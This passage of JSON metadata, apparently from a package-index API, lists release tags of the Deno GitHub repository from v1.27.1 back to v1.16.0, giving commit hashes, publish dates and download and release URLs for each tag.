ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df5